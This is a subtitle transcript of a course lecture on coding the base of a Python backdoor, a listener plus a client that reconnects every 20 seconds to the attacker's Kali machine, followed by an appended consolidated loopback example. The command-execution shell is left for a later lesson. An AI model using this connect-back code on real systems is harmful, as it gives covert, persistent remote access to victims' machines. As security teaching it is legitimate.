1
00:00:00,360 --> 00:00:01,500
-: Welcome back.

2
00:00:01,500 --> 00:00:04,140
Time to start coding our backdoor.

3
00:00:04,140 --> 00:00:06,450
So in this video we're going to start

4
00:00:06,450 --> 00:00:08,550
with the base of our program.

5
00:00:08,550 --> 00:00:11,610
Remember that we must create 2 different programs,

6
00:00:11,610 --> 00:00:14,250
a server and a backdoor.

7
00:00:14,250 --> 00:00:16,470
And it doesn't matter with which one we start.

8
00:00:16,470 --> 00:00:20,640
So let's, in this case, start coding the server first.

9
00:00:20,640 --> 00:00:23,760
We're going to code both of them simultaneously.

10
00:00:23,760 --> 00:00:27,180
So what I'm going to do is I'm going to open the terminal.

11
00:00:27,180 --> 00:00:29,610
And remember that we have this tools directory

12
00:00:29,610 --> 00:00:31,170
from the first project.

13
00:00:31,170 --> 00:00:34,650
Let us navigate there, and instead of the port scanner

14
00:00:34,650 --> 00:00:36,540
we're going to make another subdirectory

15
00:00:36,540 --> 00:00:39,363
inside of here and call this backdoor.

16
00:00:40,350 --> 00:00:42,210
Then we're going to change the directory

17
00:00:42,210 --> 00:00:44,190
to the subdirectory, and here we are going

18
00:00:44,190 --> 00:00:46,290
to code our tools.

19
00:00:46,290 --> 00:00:49,470
So as I said, let's start with the server first.

20
00:00:49,470 --> 00:00:52,290
To do that we type server.py.

21
00:00:52,290 --> 00:00:54,720
We open it using nano and here

22
00:00:54,720 --> 00:00:57,270
we're going to code our project.

23
00:00:57,270 --> 00:01:00,360
So what's the first thing that we must do?

24
00:01:00,360 --> 00:01:03,900
Well, since these 2 programs are going to communicate

25
00:01:03,900 --> 00:01:07,620
with one another, they must establish a connection first.

26
00:01:07,620 --> 00:01:09,780
And we know that we can do that

27
00:01:09,780 --> 00:01:13,110
with the help of the socket library.
28
00:01:13,110 --> 00:01:16,260
So socket allows us to initiate an internet connection

29
00:01:16,260 --> 00:01:18,210
between 2 machines.

30
00:01:18,210 --> 00:01:19,860
So how are we going to do that?

31
00:01:19,860 --> 00:01:22,500
Well, the first thing that we must do,

32
00:01:22,500 --> 00:01:24,780
and that we also did inside of our port scanner,

33
00:01:24,780 --> 00:01:28,380
is we must initiate a socket object.

34
00:01:28,380 --> 00:01:31,440
And I'm going to call my socket object sock

35
00:01:31,440 --> 00:01:33,510
inside of the server.py

36
00:01:33,510 --> 00:01:36,450
and to initiate it I will type socket.socket.

37
00:01:36,450 --> 00:01:37,740
So we are doing this with the help

38
00:01:37,740 --> 00:01:39,720
of the socket library and here

39
00:01:39,720 --> 00:01:42,930
in the brackets we want to specify 2 different parameters,

40
00:01:42,930 --> 00:01:45,123
socket.AF_INET,

41
00:01:46,793 --> 00:01:50,340
socket.SOCK_STREAM.

42
00:01:50,340 --> 00:01:51,690
And I know what you're thinking.

43
00:01:51,690 --> 00:01:54,090
What even are these arguments?

44
00:01:54,090 --> 00:01:58,140
Well, this socket.AF_INET tells our program

45
00:01:58,140 --> 00:01:59,760
that we are going to make a connection

46
00:01:59,760 --> 00:02:02,130
over an IPv4 address.

47
00:02:02,130 --> 00:02:05,010
And this socket.SOCK_STREAM tells our program

48
00:02:05,010 --> 00:02:08,100
that we're going to use a TCP connection.

49
00:02:08,100 --> 00:02:09,840
So, simple as that.

50
00:02:09,840 --> 00:02:12,330
Now the next thing that we want to do is we want

51
00:02:12,330 --> 00:02:15,900
to bind the IP address and the port.

52
00:02:15,900 --> 00:02:17,520
This is something that we already did inside

53
00:02:17,520 --> 00:02:20,400
of our first project, so there's nothing really too much

54
00:02:20,400 --> 00:02:21,233
to explain right here.
55
00:02:21,233 --> 00:02:25,470
We just type sock and use the method .bind,

56
00:02:25,470 --> 00:02:27,540
open 2 and close 2 brackets.

57
00:02:27,540 --> 00:02:30,540
And the first parameter is going to be the IP address

58
00:02:30,540 --> 00:02:32,280
of our Kali Linux machine.

59
00:02:32,280 --> 00:02:34,773
In my case, if I go and check it out,

60
00:02:36,120 --> 00:02:38,160
this is .1.12.

61
00:02:38,160 --> 00:02:42,930
So we'll go right here and specify 192.168.1.12

62
00:02:42,930 --> 00:02:44,070
as the first parameter.

63
00:02:44,070 --> 00:02:47,640
And remember it must be between the quotes.

64
00:02:47,640 --> 00:02:49,410
Then I will specify a comma,

65
00:02:49,410 --> 00:02:51,030
and the port that we are going to use,

66
00:02:51,030 --> 00:02:53,910
well, we can just go with port 5555.

67
00:02:53,910 --> 00:02:54,743
Why not?

68
00:02:54,743 --> 00:02:56,433
It doesn't even matter, to be honest.

69
00:02:57,360 --> 00:03:00,123
After we do all of this, we have bound the IP address

70
00:03:00,123 --> 00:03:01,380
with the port.

71
00:03:01,380 --> 00:03:03,210
And now the next thing that we must do

72
00:03:03,210 --> 00:03:06,900
is we must start listening for the incoming connections.

73
00:03:06,900 --> 00:03:09,810
Remember this was the crucial part in the reverse shells.

74
00:03:09,810 --> 00:03:11,520
The target executes the payload

75
00:03:11,520 --> 00:03:14,550
but we must listen for the incoming connections.

76
00:03:14,550 --> 00:03:17,340
And that is exactly what our server program will do.

77
00:03:17,340 --> 00:03:19,470
It will listen for the connections and

78
00:03:19,470 --> 00:03:21,450
once the target executes a payload,

79
00:03:21,450 --> 00:03:24,660
they will connect to our server program.
80
00:03:24,660 --> 00:03:28,350
So to do that, we can first print like this,

81
00:03:28,350 --> 00:03:33,350
let us print Listening For The Incoming Connections

82
00:03:34,500 --> 00:03:37,710
just so we know at which part of the program we are.

83
00:03:37,710 --> 00:03:42,090
And below that we can type sock.listen

84
00:03:42,090 --> 00:03:44,640
and we are going to specify 5 in the brackets,

85
00:03:44,640 --> 00:03:46,230
meaning that we're going to listen

86
00:03:46,230 --> 00:03:48,150
for up to 5 different connections.

87
00:03:48,150 --> 00:03:51,480
Okay, so our program will now be stuck on this

88
00:03:51,480 --> 00:03:54,750
part until the connection is established.

89
00:03:54,750 --> 00:03:57,450
Once the target tries to connect back to us

90
00:03:57,450 --> 00:04:00,990
we need to store their connection in a few variables.

91
00:04:00,990 --> 00:04:03,570
In other words, we need to store their socket object

92
00:04:03,570 --> 00:04:06,270
that we're going to use to communicate with the target

93
00:04:08,519 --> 00:04:11,130
and we're also going to split that into an IP address.

94
00:04:11,130 --> 00:04:13,110
So what I'm going to do is I'm going

95
00:04:13,110 --> 00:04:15,780
to type target, ip.

96
00:04:15,780 --> 00:04:18,630
These are going to be 2 separate variables

97
00:04:18,630 --> 00:04:22,019
and they're going to be equal to sock.accept.

98
00:04:22,019 --> 00:04:24,510
And this accept method is simply just

99
00:04:24,510 --> 00:04:28,140
accepting the incoming connection and storing the target's

100
00:04:28,140 --> 00:04:31,320
socket object right here and the IP address

101
00:04:31,320 --> 00:04:33,330
in the second variable.

102
00:04:33,330 --> 00:04:34,593
Simple as that.

103
00:04:35,520 --> 00:04:39,060
Once we do that and once the connection is accepted

104
00:04:39,060 --> 00:04:44,060
we can print that Target Connected

105
00:04:44,280 --> 00:04:46,230
and we can add From.
106
00:04:46,230 --> 00:04:48,030
And what we are going to do here is we are going

107
00:04:48,030 --> 00:04:52,620
to close the quote and add a + sign and then the string

108
00:04:52,620 --> 00:04:54,960
of the ip variable.

109
00:04:54,960 --> 00:04:57,690
And once again, remember the ip variable will store

110
00:04:57,690 --> 00:04:59,610
the IP address of the target.

111
00:04:59,610 --> 00:05:01,350
So what we are essentially doing right here

112
00:05:01,350 --> 00:05:03,690
is we're printing that we got the connection

113
00:05:03,690 --> 00:05:05,820
from the target's IP address.

114
00:05:05,820 --> 00:05:10,140
Okay, we need to close one more bracket right here.

115
00:05:10,140 --> 00:05:12,420
And what we're going to do at the end

116
00:05:12,420 --> 00:05:14,250
is we're just going to enter a function

117
00:05:14,250 --> 00:05:15,650
called target_communication.

118
00:05:17,010 --> 00:05:18,960
Now of course this function doesn't exist and

119
00:05:18,960 --> 00:05:21,060
we're going to code it in some future video.

120
00:05:21,060 --> 00:05:23,910
But for now let's just leave it right here.

121
00:05:23,910 --> 00:05:26,610
We successfully created a socket object,

122
00:05:26,610 --> 00:05:29,040
bound the IP address with the port.

123
00:05:29,040 --> 00:05:31,230
We listened for the incoming connections

124
00:05:31,230 --> 00:05:33,930
and at the end we accepted the connection

125
00:05:33,930 --> 00:05:35,940
from our target system.

126
00:05:35,940 --> 00:05:38,280
We're going to leave it at this for now

127
00:05:38,280 --> 00:05:39,780
on our server program.

128
00:05:39,780 --> 00:05:43,230
And let's go to our backdoor program.

129
00:05:43,230 --> 00:05:46,590
Now we need to figure out the code for our backdoor

130
00:05:46,590 --> 00:05:50,460
to make it connect to our server.py.

131
00:05:50,460 --> 00:05:52,530
So the first thing that we're going to do is

132
00:05:52,530 --> 00:05:57,530
of course to import the socket library.
133
00:05:58,230 --> 00:06:00,480
Then as in the server program

134
00:06:00,480 --> 00:06:02,520
we need to initiate the socket object.

135
00:06:02,520 --> 00:06:04,740
And I'm not going to call it sock right here,

136
00:06:04,740 --> 00:06:06,930
I'm just going to call it s.

137
00:06:06,930 --> 00:06:09,660
And here we're going to specify the same parameters,

138
00:06:09,660 --> 00:06:12,093
socket.AF_INET,

139
00:06:13,278 --> 00:06:15,663
socket.SOCK_STREAM.

140
00:06:16,680 --> 00:06:18,540
We already explained what these are.

141
00:06:18,540 --> 00:06:20,610
And the only thing that we need to do right here

142
00:06:20,610 --> 00:06:23,760
is we need to connect to our target machine.

143
00:06:23,760 --> 00:06:26,730
But we're not going to use the connect method right here.

144
00:06:26,730 --> 00:06:28,230
What we are going to do is we are going

145
00:06:28,230 --> 00:06:30,840
to call the connection function.

146
00:06:30,840 --> 00:06:33,030
And of course this is a function that doesn't exist.

147
00:06:33,030 --> 00:06:35,220
So we must code it up here.

148
00:06:35,220 --> 00:06:36,510
Let's define it first.

149
00:06:36,510 --> 00:06:37,770
So define connection.

150
00:06:37,770 --> 00:06:40,680
It will take no parameters between the brackets.

151
00:06:40,680 --> 00:06:43,260
And what we are going to do is we are going

152
00:06:43,260 --> 00:06:46,680
to type right here, try, which is the try statement.

153
00:06:46,680 --> 00:06:50,580
So it will try to connect to our Kali Linux machine.

154
00:06:50,580 --> 00:06:53,220
And remember the connect function requires 2 open and

155
00:06:53,220 --> 00:06:54,960
2 closed brackets the same way

156
00:06:54,960 --> 00:06:56,280
that the bind function does.

157
00:06:56,280 --> 00:06:59,640
And it also takes 2 parameters, of which the first one

158
00:06:59,640 --> 00:07:03,060
is the IP address of the machine that we want to connect to.
159
00:07:03,060 --> 00:07:04,350
So this will be the IP address

160
00:07:04,350 --> 00:07:06,210
of the Kali Linux machine once again.

161
00:07:06,210 --> 00:07:09,420
And the port will be once again the port 5555

162
00:07:09,420 --> 00:07:11,700
because we want to connect to that port,

163
00:07:11,700 --> 00:07:15,780
since our server program will be listening on that port.

164
00:07:15,780 --> 00:07:18,750
If it manages to connect, we're going to enter

165
00:07:18,750 --> 00:07:21,870
a second function which is going to be called shell.

166
00:07:21,870 --> 00:07:24,360
And this shell function also doesn't exist.

167
00:07:24,360 --> 00:07:26,700
We're going to code it and what will be the purpose

168
00:07:26,700 --> 00:07:29,820
of this shell function is executing the commands.

169
00:07:29,820 --> 00:07:32,250
So for now, we're just going to leave it right here,

170
00:07:32,250 --> 00:07:34,920
and we're going to code it later.

171
00:07:34,920 --> 00:07:36,693
Once we leave the shell function, we can close

172
00:07:36,693 --> 00:07:40,323
this socket object and in the except statement,

173
00:07:41,310 --> 00:07:43,170
we can call again

174
00:07:43,170 --> 00:07:45,960
this connection function.

175
00:07:45,960 --> 00:07:49,110
Now you might be wondering why we are doing this.

176
00:07:49,110 --> 00:07:52,560
Well, if I add something like this right here.

177
00:07:52,560 --> 00:07:55,083
So I go and type while True,

178
00:07:56,130 --> 00:07:58,470
which is, remember, the infinite loop,

179
00:07:58,470 --> 00:08:01,620
and I tab all of these commands once

180
00:08:01,620 --> 00:08:03,873
so they can belong to the while True loop.

181
00:08:04,770 --> 00:08:06,930
And right here I'm going to also

182
00:08:06,930 --> 00:08:09,120
add a statement, time.sleep.

183
00:08:09,120 --> 00:08:11,340
And give me just one second, I will explain

184
00:08:11,340 --> 00:08:13,050
why I'm doing this.
185
00:08:13,050 --> 00:08:15,570
Let me just code the function till the end.

186
00:08:15,570 --> 00:08:19,800
I will break right here and I will import the time library

187
00:08:19,800 --> 00:08:23,070
because we are going to need it since we use it right here.

188
00:08:23,070 --> 00:08:25,500
So what are we doing right here?

189
00:08:25,500 --> 00:08:27,930
We're calling the connection function.

190
00:08:27,930 --> 00:08:32,159
This connection function starts an infinite while True loop.

191
00:08:32,159 --> 00:08:35,400
This infinite while True loop sleeps for 20 seconds,

192
00:08:35,400 --> 00:08:39,090
and then it tries to connect to our Kali Linux machine.

193
00:08:39,090 --> 00:08:42,270
If it manages to connect, it will go inside

194
00:08:42,270 --> 00:08:44,850
of the shell function where we will execute the commands

195
00:08:44,850 --> 00:08:46,170
on the target system.

196
00:08:46,170 --> 00:08:48,930
If it doesn't manage to connect, it will go

197
00:08:48,930 --> 00:08:51,600
into this except statement and it will call

198
00:08:51,600 --> 00:08:54,270
the same function once again.

199
00:08:54,270 --> 00:08:56,220
So, what does this tell you?

200
00:08:56,220 --> 00:08:59,100
It will run this function infinitely

201
00:08:59,100 --> 00:09:01,680
until it manages to connect.

202
00:09:01,680 --> 00:09:04,020
So this is good because of one reason.

203
00:09:04,020 --> 00:09:06,600
We don't want our target to start the payload

204
00:09:06,600 --> 00:09:08,400
and not be able to connect

205
00:09:08,400 --> 00:09:11,370
just because we haven't started the server yet.

206
00:09:11,370 --> 00:09:12,690
We want to be able to connect

207
00:09:12,690 --> 00:09:15,360
to the target system whenever we want.

208
00:09:15,360 --> 00:09:18,720
So this function will tell the payload to try to connect

209
00:09:18,720 --> 00:09:20,940
every 20 seconds.
210
00:09:20,940 --> 00:09:23,670
Every 20 seconds while their machine is running,

211
00:09:23,670 --> 00:09:26,760
this program will try to connect to our Kali Linux machine.

212
00:09:26,760 --> 00:09:29,490
So we can start the server at any point in time,

213
00:09:29,490 --> 00:09:33,840
and after 20 seconds it will establish a connection to us.

214
00:09:33,840 --> 00:09:38,250
So this is just calling this function over and over again

215
00:09:38,250 --> 00:09:42,720
until this line right here works, and they connect to us.

216
00:09:42,720 --> 00:09:46,413
Then we enter a second function which is the shell function.

217
00:09:47,340 --> 00:09:51,150
Okay, this is the base of our backdoor.py.

218
00:09:51,150 --> 00:09:53,700
Here is how we are going to connect to our server.

219
00:09:53,700 --> 00:09:56,340
And in the next video we're going to see

220
00:09:56,340 --> 00:09:58,470
what we're going to do with the contents

221
00:09:58,470 --> 00:10:00,120
of the shell function,

222
00:10:00,120 --> 00:10:02,590
and if I save this, Control O,

223
00:10:03,600 --> 00:10:06,930
and also the target communication function.

224
00:10:06,930 --> 00:10:08,790
So these are the functions that will receive

225
00:10:08,790 --> 00:10:11,130
and execute commands.

226
00:10:11,130 --> 00:10:13,740
Feel free to post any question you have about the code,

227
00:10:13,740 --> 00:10:16,050
if there is something that you do not understand.

228
00:10:16,050 --> 00:10:18,750
And in the next lecture we are going to continue

229
00:10:18,750 --> 00:10:21,240
with the coding of our programs.

230
00:10:21,240 --> 00:10:22,073
See you there.
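The base of both programs from this lecture, written out as one runnable example. This is an added example, not the course's own server.py or backdoor.py: it assumes loopback (127.0.0.1) and an OS-chosen port instead of the 192.168.1.12:5555 used in the video so it can run on one machine, it implements the "try again every N seconds" idea as a loop that opens a fresh socket per attempt (a socket whose connect() failed is not reliably reusable, and calling the function again from the except branch would grow the call stack on every failure), and it adds an optional attempt limit so the reconnect loop can be tested. `demo_handshake`, `unused_loopback_port` and the `RETRY_DELAY` constant are names introduced here, not from the lecture.

```python
import socket
import threading
import time
from typing import Optional, Tuple

# Assumed defaults for this stand-alone example: loopback instead of the
# 192.168.1.12 address from the video, and port 0 so the OS picks a free port.
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 0
RETRY_DELAY = 20.0  # the video sleeps 20 seconds between connection attempts


def start_listener(host: str = DEFAULT_HOST, port: int = DEFAULT_PORT) -> socket.socket:
    """Server side: create the socket, bind it and start listening.

    Returns the listening socket so the caller can read the chosen port with
    sock.getsockname()[1] and then call accept_one() on it.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # IPv4 + TCP
    # Allow re-binding the same port right after a previous server exited,
    # instead of waiting for the old connection's TIME_WAIT to expire.
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((host, port))
    sock.listen(5)  # backlog of pending connections, as in the video
    print("[+] Listening For The Incoming Connections")
    return sock


def accept_one(listener: socket.socket) -> Tuple[socket.socket, Tuple[str, int]]:
    """Block until a target connects; return (target socket, (ip, port))."""
    target, addr = listener.accept()
    print("[+] Target Connected From " + str(addr[0]))
    return target, addr


def connect_with_retry(host: str, port: int, delay: float = RETRY_DELAY,
                       max_attempts: Optional[int] = None) -> Tuple[Optional[socket.socket], int]:
    """Backdoor side: keep trying to reach the server every `delay` seconds.

    Returns (connected socket, number of attempts). With max_attempts=None it
    loops forever like the video's while True; a bounded value returns
    (None, attempts) once that many attempts have failed.
    """
    attempts = 0
    while max_attempts is None or attempts < max_attempts:
        attempts += 1
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((host, port))
            return s, attempts
        except OSError:
            # Server not up yet (refused, unreachable, timed out): discard this
            # socket, wait, and try again with a new one.
            s.close()
            time.sleep(delay)
    return None, attempts


def unused_loopback_port() -> int:
    """Pick a free loopback port by binding to 0 and releasing it (helper)."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind((DEFAULT_HOST, 0))
    port = probe.getsockname()[1]
    probe.close()
    return port


def demo_handshake(delay: float = 0.1) -> Tuple[str, bytes, int]:
    """Run both sides on loopback with the server deliberately started late.

    The backdoor thread starts first and fails at least once, the listener
    comes up after 3 * delay, the backdoor's next attempt gets through, sends
    one constructed line and the server echoes it back.
    Returns (client ip seen by the server, bytes the client got back, attempts).
    """
    port = unused_loopback_port()
    result = {}

    def backdoor_side():
        s, attempts = connect_with_retry(DEFAULT_HOST, port, delay=delay)
        result["attempts"] = attempts
        s.sendall(b"hello from target\n")  # constructed sample message
        result["reply"] = s.recv(1024)
        s.close()

    t = threading.Thread(target=backdoor_side)
    t.start()
    time.sleep(3 * delay)  # server is not running yet: first attempts fail
    listener = start_listener(DEFAULT_HOST, port)
    target, addr = accept_one(listener)
    data = target.recv(1024)
    target.sendall(b"server got: " + data)
    target.close()
    t.join()
    listener.close()
    return addr[0], result["reply"], result["attempts"]


if __name__ == "__main__":
    print(demo_handshake())
```

Two things worth keeping in mind when you build on this. The listener as written accepts whatever connects to that port and has no way to tell the real target from anything else on the network that reaches it, so any command-handling added in the next lecture should not assume the peer is trustworthy. And a fixed 20 second sleep between attempts is a very regular beacon on the wire; the interval is a detection signal, not just a convenience.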